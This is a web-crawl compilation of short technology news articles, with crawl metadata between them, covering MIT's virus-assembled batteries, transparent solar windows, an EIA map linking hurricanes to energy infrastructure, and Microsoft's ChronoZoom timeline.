technologies in Computerworld's Emerging Technologies Topic Center. This story, "NASA budget includes plan to capture and redirect asteroid into Earth orbit" was originally published by Computerworld.
<urn:uuid:3b972be5-5a06-4c1a-923b-d6bc28d6f46d>
CC-MAIN-2017-09
http://www.itworld.com/article/2708925/hardware/nasa-budget-includes-plan-to-capture-and-redirect-asteroid-into-earth-orbit.html?page=2
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170600.29/warc/CC-MAIN-20170219104610-00577-ip-10-171-10-108.ec2.internal.warc.gz
en
0.938572
826
3.109375
3
MIT Builds Batteries with Viruses Normally, one would associate the word virus with something negative, whether it is a malfunctioning desktop computer or a sickness. However, researchers at the Massachusetts Institute of Technology have "trained" viruses in a lab to create a miniature battery. By manipulating a few genes within the virus, researchers were able to get the organism to grow and then assemble itself into a functional electronic device. They hope to be able to build a battery that could be as small as a grain of rice. Two opposite electrodes -- or conductors -- form the structure of a battery, called an anode and a cathode. These are separated by something called an electrolyte, a liquid of gel-like substance that contains ions and can conduct electricity. In the process created by MIT researchers, the viruses were engineered to create the anode by collecting cobalt oxide and gold. Since these viruses have a negative charge, they are then layered between oppositely charged synthetic polymers to create thin sheets. Batteries made with this process could store two to three times the energy of traditional batteries that size, meaning a longer-lasting charge. While the researchers did not specify any early applications of the technology, it would likely first appear in Defense Department work. The project was funded by the Army Research Office, MIT said. The group's work is expected to appear in this week's issue of Science.
<urn:uuid:641cd169-857a-4422-b6a0-2272addf1624>
CC-MAIN-2017-09
https://betanews.com/2006/04/07/mit-builds-batteries-with-viruses/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171070.80/warc/CC-MAIN-20170219104611-00277-ip-10-171-10-108.ec2.internal.warc.gz
en
0.965223
288
3.90625
4
Manhattan has approximately 47,000 buildings with around 10.7 million windows, according to a 2013 estimate from The New York Times. Now imagine if just 1% -- or 100,700 -- of those windows could generate electricity through transparent photovoltaics. That's the idea behind solar power windows, and at least two companies are hoping to sell the technology to window manufacturers, saying once installed in a building the technology will pay for itself in about a year. "If you look at the glass that's manufactured worldwide today, 2% of it is used for solar panels; 80% of it is used in buildings. That's the opportunity," said Suvi Sharma, CEO of solar panel maker Solaria. Solaria uses existing photovoltaic (PV) cells and slices them into 2.5mm strips. It then sandwiches those thin PV strips between glass layers in a window. "The way human eye works, you don't even notice them," Sharma said. An additional benefit? As the PV strips absorb light striking a building's window, they reduce the "solar heat gain coefficient"; in other words, the windows reduce the sunlight's effect on a building's internal air temperature and thereby lower air conditioning costs. Solaria is targeting its technology for windows that will be installed in newly constructed buildings. Another company, SolarWindow Technologies, is pitching a different form of transparent PV cell technology for new construction, replacement windows and retrofits to existing windows. SolarWindow is using what it calls organic photovoltaics, which can vary in color and transparency. The company is planning to announce its product in a couple of weeks. SolarWindow CEO John Conklin said what sets his company's technology apart is its ease of integration. Because it's based on a PV film, it can be adhered to existing windows or incorporated into manufactured products relatively easily. Depending on the number of south-facing windows, which receive a majority of the sun's light, and the building's location in the U.S., Solaria's technology could provide from 20% to 30% of a skyscraper's energy needs, Conklin said. Conklin would not disclose exactly which organic material SolarWindow uses. In 2013, however, Oxford University researchers released the results of a study on how neutral-colored, semi-transparent solar cells made of perovskite could be used in building and car windows to generate electricity. Perovskite is an oxide used in ceramic superconductors. The Oxford researchers said they could create transparent solar cells with comparatively high efficiencies. For example, the researchers were able to drive PV efficiencies up to 20% in a "remarkably short period of time" using a simple cell architecture. The university's work is being commercialized by Oxford Photovoltaics (a spin-out company), which is planning to produce attractively colored and semi-transparent glass, which works as a solar cell and could be integrated into the facades of buildings and windows. Similarly, a team of researchers at Michigan State University (MSU) has developed a new type of transparent solar concentrator that when placed over a window creates solar energy. Called a transparent luminescent solar concentrator (TLSC), MSU's technology can not only be used on building windows but also on cell phones and any other device that has a clear, uncolored surface. Richard Lunt of MSU's College of Engineering said the key to the TLSC technology is that it's completely transparent. "No one wants to sit behind colored glass," Lunt, an assistant professor of chemical engineering and materials science, said in a statement. "It makes for a very colorful environment, like working in a disco. We take an approach where we actually make the luminescent active layer itself transparent." MSU's solar harvesting technology uses small organic molecules developed by Lunt and his team to absorb specific nonvisible wavelengths of sunlight. One problem with MSU's technology is that more work is needed to improve its energy efficiency. Currently it is able to produce a solar conversion efficiency close to 1%, but the researchers hope to achieve efficiencies beyond 5% when fully optimized. Today, traditional solar power panels that reside in solar farms or on building rooftops can achieve a PV efficiency of about 15% to 20%. The efficiency rating refers to how much of the photons striking a solar cell are converted into energy. Solaria's solar window technology can achieve a solar effiency of about 8% to 10%. SolarWindow's Conklin would not disclose his company's technology efficiency rating, but did say it was less than standard PV panels. "Obviously when you're looking at absorbing visible light and it's transparent, it's not as efficient as an opaque panel," Conklin said. When it comes to solar windows, however, efficiency matters less than transparency, Conklin said. "When you're looking at transparent or clear photovoltaics, it's not necessarily a function of power conversion efficiency as it is about using the vast amount of space available for that tech," Conklin said. "We're making use of the space that right now is not available for solar energy production. Passive windows are turned into active energy generating windows." In other words, transparent solar PV is about not wasting perfectly good real estate in order to supplement a building's power requirements. The solar window technologies utilize varying methods of transmitting the energy that the PVs produce to a building's internal power infrastructure. Solaria, for example, hides its wiring in the window's frame, and the connectors are wired into a newly constructed building's electrical conduits. Those conduits lead to a central power inverter, which converts the solar windows direct current to alternating current that's usable in the electric grid. SolarWindow's technology can come with micro DC-to-AC power inverters, allowing the electricity to be used only in one room with a solar window. Alternately, it can be connected to a distributed microgrid inverter to power a single floor of a building or to a central inverter from which the entire building can draw power. Solaria is already piloting its windows in "a few" buildings and it is working on the first large-scale commercial projects in California and Europe, according to Sharma. Sharma did not disclose the projects. Solaria has also partnered with Tokyo-based Asahi Glass Co., a global glass manufacturer. Sharma said Asahi intends to sell both windows and a bamboo shade called Sudare with embedded solar cells from Solaria. "So we're enabling different glass and curtain wall providers in North America, Europe and Asia to provide products," Sharma said. Solar windows will cost about 40% more than conventional windows, but the ROI is achievable in under a year and there's big demand even though products have yet to ship, the manufacturers say. "It's actually very viable and will be even more viable as we approach our product launch," Conklin said. "It's in very high demand because right now skyscrapers... don't have a good way of offsetting energy through renewable energy generation." This story, "Solar windows can power buildings" was originally published by Computerworld.
<urn:uuid:3719d0ff-2897-4005-81c6-6a0a16524bec>
CC-MAIN-2017-09
http://www.itnews.com/article/2980236/sustainable-it/solar-windows-poised-to-change-the-way-we-power-buildings.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170249.75/warc/CC-MAIN-20170219104610-00097-ip-10-171-10-108.ec2.internal.warc.gz
en
0.947762
1,496
3
3
Hurricane season is well in progress, and won’t wrap up until the end of November. And in looking back at last hurricane season, when Sandy rocked the East Coast, hundreds of lives were lost and countless people were displaced from their homes. But that's not all that was affected -- so was our energy infrastructure. "High winds took down power lines. Rising seas flooded electric substations. Within 24 hours of Sandy’s landfall, more than 8 million utility customers lost power," wrote David Sandalow, former Assistant secretary for Policy & International Affairs Fuel at the U.S. Department of Energy. "Fuel distribution networks were paralyzed. Critical terminals for petroleum and petroleum products were badly damaged. Many service stations lost power and couldn’t pump gas, leading to long gasoline lines in the New York/New Jersey area." But this year's hurricane season may prove a bit different for the energy sector, thanks to a newly updated interactive map, pictured below, made available by the U.S. Energy Information Administration (EIA). Now, those in the energy industry may keep an extra close watch on the natural disasters as they unfold. What was an existing state map launched by the agency last September now includes more than 20 layers of GIS data to plot the nation’s energy infrastructure and resources. The data can be mashed up with real-time tropical storm and hurricane information from the National Hurricane Center, so resources like offshore production rigs, pipelines, coastal refineries power plants, and energy import and exports sites can be monitored as the severe weather occurs, according to the EIA. The National Hurricane Center, part of the National Oceanic and Atmospheric Administration, uses separate tools for tracking hurricane paths and carrying out public advisories. EIA spokesman Mark Elbert said the agency’s existing state map served as a state energy portal on the geography of states, and incorporating the additional data layers from the National Hurricane Center leverages what the EIA had already developed with the state map. Previously when the EIA would update the map with hurricane information, there was no interactive component and information was not available in real time. When a hurricane or tropical storm would come through, updates would get posted periodically; however, there was always a delay in presenting the most up-to-date information. When viewing the map after clicking the “full view” setting, users can see data layers such as information on active storms and the rank of their severity, recent storms, official hurricane warnings and wind speed. The data layers listed in a column next to the map allows users to check individual boxes to decide how many or how few of the data layers they wish to see at one time. “For example, you can click on the interstate pipelines, and it will give you a great deal of the pipelines, including the offshore ones out to the rigs so you can see the infrastructure there,” Elbert said. Having access to data that mashes up energy resources with real-time storm information is particularly beneficial to those in the energy industry, said EIA spokeswoman Amy Sweeney, because it gives them a sense of how markets might be affected. Last year when Hurricane Isaac came up from the Gulf of Mexico and pushed its way up the Eastern Seaboard, several areas where natural gas gets produced lied in its path. As a result, the storm affected natural gas drilling platforms and processing plants. Sweeney said when situations like these occur, processing plants are vulnerable to getting shut in, which could lead to a certain percentage of the capacity of natural gas production to be curtailed. Storm destruction at or near natural gas production could therefore affect gas prices. Sweeney said similar situations occur with petroleum when hurricanes and tropical storms come across oil refineries. But by having information like what percentage of processing plants are out of commission, Sweeney said, “You can do some analysis that some customers in this area are going to be without power; without natural gas. It’s providing good baseline information."
<urn:uuid:60c49f0f-468e-4af4-93a8-142602adaa8a>
CC-MAIN-2017-09
http://www.govtech.com/Map-Mashes-Hurricane-Information-with-Energy-Infrastructure-Data.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170253.67/warc/CC-MAIN-20170219104610-00445-ip-10-171-10-108.ec2.internal.warc.gz
en
0.949569
819
2.609375
3
Status: “Ready for mass consumption,” but set for regular, consistent iterations. A by-product of Big Data, Big History is the study of time going all the way back to the Big Bang. Using a scale that begins 13.7 billion years ago, ChronoZoom breaks up history by thresholds that represent moments in time. Treshhold 1, the Big Bang, is detailed with documents, images, and videos, known as artifacts, as well as a bibliography so the source of that information can be traced. Customizable narrations are especially useful add-ons for those in education or academia, allowing professors to provide their own interpretation of a window in time.
<urn:uuid:906cd24e-9b7f-4dab-a4da-a12ad1e10d62>
CC-MAIN-2017-09
http://www.cio.com/article/2368441/project-management/10-cool-projects-from-microsoft-s-research-arm.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170614.88/warc/CC-MAIN-20170219104610-00621-ip-10-171-10-108.ec2.internal.warc.gz
en
0.942641
141
3.046875
3